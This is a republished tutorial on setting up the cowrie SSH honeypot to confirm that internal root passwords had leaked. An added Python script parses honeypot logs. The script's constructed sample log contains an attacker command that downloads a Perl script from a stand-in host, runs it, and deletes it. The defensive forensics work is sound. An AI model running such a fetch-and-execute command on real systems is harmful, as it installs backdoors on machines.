SSH honeypot cowrie actual combat

2025-03-29 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

Background

Recently a number of our servers were compromised, and because many machines were involved the impact was considerable. Basically all of our servers have firewall policies in place and the passwords are complex. At the moment there is no particularly good way to investigate: we had not set up log collection or prepared any other forensic means beforehand, so there was little that could be done after the fact, and on the compromised machines the system commands had basically all been replaced, which leaves even less to work with.

While going through the compromised servers we found that the firewall on one of them was turned off (possibly turned off by the attacker, possibly it had always been off). Lacking a better lead, we start from the hypothesis that this server was compromised first because its firewall was off, and was then used as a jump host to compromise the other machines one after another. If this hypothesis holds, it means that the passwords we commonly use have been collected by outsiders. To test it we need some tooling, and an SSH honeypot is the most direct form of proof. There are many SSH honeypots; after some comparison we chose cowrie. Not because it is necessarily the best of its kind, but because a look at GitHub shows that it is still being actively updated, while several of the alternatives were last updated years ago.

Cowrie introduction

http://www.cowrie.org/ is the official website. To be honest, the page is not great: there is very little to see, and what is there is hard to find.

https://github.com/cowrie/cowrie is the GitHub repository, and its content is fine.

What we need this time is an SSH honeypot. An SSH honeypot is a program that emulates an SSH service on a port so that attackers believe they are talking to a real SSH server, and then records what they do: the source IP, the account and password used to log in, the commands run after login, and so on.

Cowrie can also feed its data into MySQL, ELK and other backends for detailed analysis of attack data. This article only uses cowrie to verify our compromise hypothesis, so it covers the most basic, practical usage and leaves integration with third-party systems for later.

Cowrie installation

The installation instructions are also a bit hidden; they are not shown on the GitHub front page. You have to open the INSTALL.md file in the repository: https://github.com/cowrie/cowrie/blob/master/INSTALL.md.

The official instructions target Ubuntu, while our environment is CentOS 7.0, but the steps are much the same. The concrete steps are given below; only part of the official procedure is followed, not all of it.

Install and configure cowrie

# install git, python-virtualenv, development headers and gcc (openssl-devel and python-devel are needed to compile the cryptography dependency later)

yum install -y git python-virtualenv bzip2-devel libffi-devel openssl-devel python-devel gcc

# update libcurl and nss, otherwise the git clone over HTTPS may fail later

yum update -y nss curl libcurl

# create a dedicated cowrie user to run the honeypot instead of running it as root, which is safer

adduser cowrie

passwd cowrie

# enter the password, then switch to the cowrie account

su - cowrie

# pull down the cowrie code with git

git clone https://github.com/cowrie/cowrie

# enter the cowrie directory once the clone succeeds

cd cowrie

# cowrie runs inside a python virtualenv. At the time of writing it supported both python2 and python3; CentOS 7.0 ships python 2.7 by default, so we initialise the virtualenv with 2.7. (Recent cowrie releases require python3, so on a current checkout use --python=python3 instead.)

virtualenv --python=python2 cowrie-env

# activate the virtualenv

source cowrie-env/bin/activate

# upgrade pip first

pip install --upgrade pip

# after upgrading pip, install the python libraries cowrie depends on. Some of them are compiled, which is why gcc and the development headers were installed beforehand.

pip install --upgrade -r requirements.txt

# if all goes well, configure cowrie and start it

# copy the default configuration file; we emulate the SSH root account first

# We use the default configuration, in which the emulated SSH service listens on port 2222. Changing it to 22 would need extra work: cowrie runs as the unprivileged cowrie user, and binding a port below 1024 requires root privileges. So we keep the default port 2222 and use an iptables rule to redirect port 22 to 2222, which is simpler.

cp etc/cowrie.cfg.dist etc/cowrie.cfg

# create the user database for the emulated SSH root account. Since we want to verify that our internal passwords have leaked, we list exactly the root passwords we suspect were leaked; only these passwords will be accepted by the honeypot, so a successful login is itself the evidence.

cat etc/userdb.txt

# the file has one username:uid:password entry per line (wildcards and other matching rules are also supported, but we do not use them here):

root:x:<suspected leaked password 1>

root:x:<suspected leaked password 2>

root:x:<suspected leaked password 3>

# once configured, start cowrie

bin/cowrie start

# after a successful start, check the running process with the following command; use bin/cowrie stop to shut it down

bin/cowrie status

Configure firewall policy

# cowrie itself is now ready; the next step is to redirect SSH port 22 to the honeypot port 2222. Before that, move the real SSH service from port 22 to another port, for example 7997. Open port 7997 in the firewall (see below) before restarting sshd, or you will lock yourself out of the machine.

vim /etc/ssh/sshd_config

# change the port

Port 7997

# SELinux only allows sshd to bind to port 22 by default, so restarting sshd on the new port fails. The quick way is to switch SELinux to permissive mode; the cleaner alternative is to keep SELinux enforcing and allow the new port with: semanage port -a -t ssh_port_t -p tcp 7997

setenforce 0

systemctl restart sshd

# open TCP ports 22 and 2222 to the outside, plus the new admin port 7997. Port 2222 must be open because the nat REDIRECT rewrites the destination port before the INPUT chain sees the packet.

iptables -A INPUT -p tcp --dport 22 -j ACCEPT

iptables -A INPUT -p tcp --dport 2222 -j ACCEPT

iptables -A INPUT -p tcp --dport 7997 -j ACCEPT

# last step: redirect incoming port 22 to the honeypot on 2222

iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

Test

# now verify that cowrie is serving SSH: ssh root@<honeypot address>

# enter a password that is not in userdb.txt; a login failure is the expected result

# enter one of the passwords listed in userdb.txt; if the login succeeds, the honeypot is working correctly

Cowrie writes its runtime logs to var/log/cowrie inside the cowrie directory. By default there are two formats: cowrie.log is a plain-text log and cowrie.json is the same events in JSON, one object per line. After running for just one night the problem showed up immediately. The relevant log content is as follows.

You can see that an external attacker logged in successfully using one of our internal passwords, and the string that follows is what they did after logging in: download a backdoor and then delete the downloaded file. This matches our hypothesis.

Cowrie also keeps a copy of every file the attacker downloaded (here, the attacker's .pl scripts), named by SHA-256 hash, under the cowrie directory at

var/lib/cowrie/downloads/2438c584311c439b585075c68c443e2e96b43a826aaf42643d7808d436df3731

The terminal session recordings (everything typed at the command line) are stored under the cowrie directory at

var/lib/cowrie/tty/1b54104347e987372b323bc6701625889cc01b8de2ce13bc9a297f1f620b5140
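The page's conclusion rests on reading cowrie.json by hand. The script below is an added example (not from the original article and not part of cowrie) that does the same check programmatically: it groups the JSON events by session, lists which attempts succeeded with which passwords, which commands were typed and which files were fetched, and then extracts the one fact the experiment was set up to prove, namely a successful login from an outside IP using a password from our suspected-leaked list. The log lines embedded in SAMPLE_LOG are constructed for the example (IPs from documentation ranges, a made-up session id and hash); the event ids and field names (cowrie.login.success, cowrie.command.input, cowrie.session.file_download, src_ip, username, password, input, url, shasum) are the ones cowrie writes. Malformed lines, as can appear in a truncated or rotated log file, are skipped rather than aborting the run.

```python
import json
from collections import defaultdict

# Constructed sample of var/log/cowrie/cowrie.json (one JSON object per line).
# These lines are made up for this example; they are not the author's real log.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","src_port":51514,"dst_port":2222,"session":"a1b2c3d4e5f6","protocol":"ssh","timestamp":"2019-06-01T02:11:03.123456Z","sensor":"honeypot-1"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","timestamp":"2019-06-01T02:11:04.000000Z","sensor":"honeypot-1"}
{"eventid":"cowrie.login.success","username":"root","password":"Suspected-Pass-1","src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","timestamp":"2019-06-01T02:11:05.000000Z","sensor":"honeypot-1"}
{"eventid":"cowrie.command.input","input":"cd /tmp; wget http://198.51.100.9/x.pl; perl x.pl; rm -f x.pl","src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","timestamp":"2019-06-01T02:11:06.000000Z","sensor":"honeypot-1"}
{"eventid":"cowrie.session.file_download","url":"http://198.51.100.9/x.pl","shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","outfile":"var/lib/cowrie/downloads/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","timestamp":"2019-06-01T02:11:07.000000Z","sensor":"honeypot-1"}
{"eventid":"cowrie.session.closed","duration":5.2,"src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","timestamp":"2019-06-01T02:11:08.000000Z","sensor":"honeypot-1"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.22","src_port":40000,"dst_port":2222,"session":"ffff0000aaaa","protocol":"ssh","timestamp":"2019-06-01T03:00:00.000000Z","sensor":"honeypot-1"}
{"eventid":"cowrie.login.failed","username":"root","password":"admin","src_ip":"198.51.100.22","session":"ffff0000aaaa","timestamp":"2019-06-01T03:00:01.000000Z","sensor":"honeypot-1"}
{"eventid":"cowrie.session.closed","duration":1.0,"src_ip":"198.51.100.22","session":"ffff0000aaaa","timestamp":"2019-06-01T03:00:02.000000Z","sensor":"honeypot-1"}
this line is not JSON (simulates a truncated log) and must be skipped
"""

# The passwords we put in etc/userdb.txt; placeholders here, the real ones are secret.
SUSPECTED_LEAKED = {"Suspected-Pass-1", "Suspected-Pass-2", "Suspected-Pass-3"}


def parse_cowrie_json(text):
    """Group cowrie JSON events by session id.

    Returns {session_id: {"src_ip", "logins": [(user, password, success)],
                          "commands": [str], "downloads": [(url, sha256)]}}.
    Lines that are not valid JSON or carry no session id are skipped.
    """
    sessions = defaultdict(lambda: {"src_ip": None, "logins": [], "commands": [], "downloads": []})
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        try:
            ev = json.loads(raw)
        except ValueError:
            continue  # truncated or corrupted line: skip, do not abort the analysis
        sid = ev.get("session")
        if not sid:
            continue
        s = sessions[sid]
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        eid = ev.get("eventid", "")
        if eid in ("cowrie.login.success", "cowrie.login.failed"):
            s["logins"].append((ev.get("username"), ev.get("password"), eid.endswith(".success")))
        elif eid == "cowrie.command.input":
            s["commands"].append(ev.get("input", ""))
        elif eid == "cowrie.session.file_download":
            s["downloads"].append((ev.get("url"), ev.get("shasum")))
    return dict(sessions)


def leaked_password_evidence(sessions, suspected):
    """Every successful login that used one of our suspected-leaked passwords.

    Only userdb.txt passwords can succeed on the honeypot, so each hit is direct
    evidence that the password is known outside. Returns [(src_ip, user, password)].
    """
    hits = []
    for s in sessions.values():
        for user, pw, ok in s["logins"]:
            if ok and pw in suspected:
                hits.append((s["src_ip"], user, pw))
    return hits


def post_login_activity(sessions):
    """Commands typed and files fetched in sessions that actually got in."""
    report = {}
    for sid, s in sessions.items():
        if any(ok for _, _, ok in s["logins"]):
            report[sid] = {"src_ip": s["src_ip"], "commands": s["commands"], "downloads": s["downloads"]}
    return report


if __name__ == "__main__":
    sessions = parse_cowrie_json(SAMPLE_LOG)
    for ip, user, pw in leaked_password_evidence(sessions, SUSPECTED_LEAKED):
        print("LEAK CONFIRMED: %s logged in as %s with password %r" % (ip, user, pw))
    for sid, act in post_login_activity(sessions).items():
        print("session %s from %s ran: %s" % (sid, act["src_ip"], act["commands"]))
        for url, sha in act["downloads"]:
            print("  downloaded %s -> var/lib/cowrie/downloads/%s" % (url, sha))
```

In practice, point parse_cowrie_json at the contents of var/log/cowrie/cowrie.json (and the rotated cowrie.json.* files) instead of SAMPLE_LOG. A non-empty result from leaked_password_evidence from any IP that is not yours is the proof the article was after; the downloads list then tells you which files under var/lib/cowrie/downloads to pull for malware analysis.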
